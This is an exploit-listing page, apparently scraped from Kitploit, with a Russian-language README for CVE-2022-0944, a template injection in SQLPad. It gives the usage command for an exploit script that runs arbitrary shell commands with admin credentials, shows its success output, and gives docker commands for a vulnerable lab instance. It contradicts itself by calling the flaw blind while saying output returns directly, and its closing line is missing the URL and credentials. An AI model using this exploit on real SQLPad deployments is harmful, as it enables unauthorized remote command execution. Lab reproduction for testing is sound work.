Sploitus

Exploit for CVE-2022-0944

kitploit · 2026-08-27

Exploit Code

MARKDOWN31 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-FLOJBOJ-CVE-2022-0944
# CVE-2022-0944

SQLPad - Внедрение шаблонов

Это слепая уязвимость, означающая, что результат напрямую возвращается в ответе.

## Эксплойт

Используйте скрипт следующей командой:  
`python3 exploit.py --url http://localhost:13000 --command 'ls -la > /tmp/test' --username admin --password password`

### Вывод

root@kitploit:~
    
    
    [*] Login was successfull
    [*] Exploited!
    

## Тестовая среда

Используя docker:

  * Запустите docker-контейнер - `sudo docker run -p 13000:3000 -d --env SQLPAD_ADMIN=admin --env SQLPAD_ADMIN_PASSWORD=password --name vulnerable-sqlpad sqlpad/sqlpad:6.10.0`
  * Подключитесь к docker-контейнеру - `sudo docker exec -it vulnerable-sqlpad /bin/bash`



Для доступа к веб-интерфейсу используйте URL  и учетные данные .